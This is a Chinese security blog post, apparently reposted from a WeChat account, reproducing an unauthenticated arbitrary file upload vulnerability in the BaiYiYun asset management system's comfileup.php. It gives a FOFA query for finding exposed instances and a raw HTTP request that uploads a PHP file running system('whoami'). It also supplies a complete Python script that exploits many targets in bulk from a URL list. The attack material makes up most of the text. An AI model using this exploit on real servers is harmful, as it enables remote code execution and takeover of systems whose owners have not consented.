百易云资产管理运营系统 comfileup.php 接口存在文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
FOFA:
body="不要着急,点此
无
POST /comfileup.php HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0Content-Type: multipart/form-data; boundary=--------1110146050 ----------1110146050Content-Disposition: form-data; name="file";filename="test.php" <?php system("whoami");unlink(__FILE__);?>----------1110146050--
拼接路径后访问会出现24642数字
后台回复 :百易云0731 获取脚本,之前用友的前面网盘失效了,兄弟们可以重新输入 用友0728获取
# encoding:utf-8import timeimport requestsimport argparseimport sslimport urllib3import reimport jsonfrom requests.exceptions import RequestExceptionfrom urllib3.exceptions import InsecureRequestWarning
# ssl._create_unverified_context:创建一个 SSL 上下文,用于处理 HTTPS 请求时不验证服务器证书的情况。ssl._create_default_https_context = ssl._create_unverified_context# urllib3.disable_warnings():禁用 urllib3 库的不安全请求警告,即不显示由于不安全的 HTTPS 请求而引发的警告信息。urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 打印颜色RED = '�33[31m'GREEN = '�33[32m'RESET = '�33[0m'
def check_vuln(url): url = url.strip("/") target = url + "/comfileup.php" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3', 'Content-Type': 'multipart/form-data; boundary=--------1110146050' } headers1 = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' 'Chrome/58.0.3029.110 Safari/537.3' } data = """----------1110146050rnContent-Disposition: form-data; name="file";filename="test.php"rnrn<?php print(111*222);unlink(__FILE__);?>rn----------1110146050--""" try: response = requests.post(target, headers=headers, data=data, verify=False, timeout=20) if response.status_code == 200 and 'fname' in response.text and '"vpath":"/uploads/' in response.text: response_data = json.loads(response.text) vpath_value = response_data['vpath'] clean_vpath = re.sub(r'\/', '/', vpath_value) res_url = url + clean_vpath result_response = requests.get(res_url, headers=headers1, verify=False, timeout=20) if result_response.status_code == 200 and '24642' in result_response.text: print(f"{RED}[+] {url} 存在任意文件上传漏洞,上传地址为:{res_url}{RESET}") else: print(f"{GREEN}[-] {url} 不存在任意文件上传漏洞{RESET}") return True else: pass except Exception as e: pass
def main(): parser = argparse.ArgumentParser(description="文件上传漏洞检测脚本") parser.add_argument("-u", "--url", help="目标URL") parser.add_argument("-f", "--file", help="目标URL列表文件")
args = parser.parse_args()
if args.url: url = "http://" + args.url if not args.url.startswith(("http://", "https://")) else args.url check_vuln(url) elif args.file: with open(args.file, "r") as f: urls = f.read().splitlines() for url in urls: url = "http://" + url if not url.startswith(("http://", "https://")) else url check_vuln(url)
if __name__ == "__main__": main()
python .BaiYiYun-comfileup-Fileupload.py -f .1.txtpython .BaiYiYun-comfileup-Fileupload.py -u 192.168.1.1
原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】百易云资产管理运营系统 comfileup.php 任意文件上传漏洞 (附批量验证脚本)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论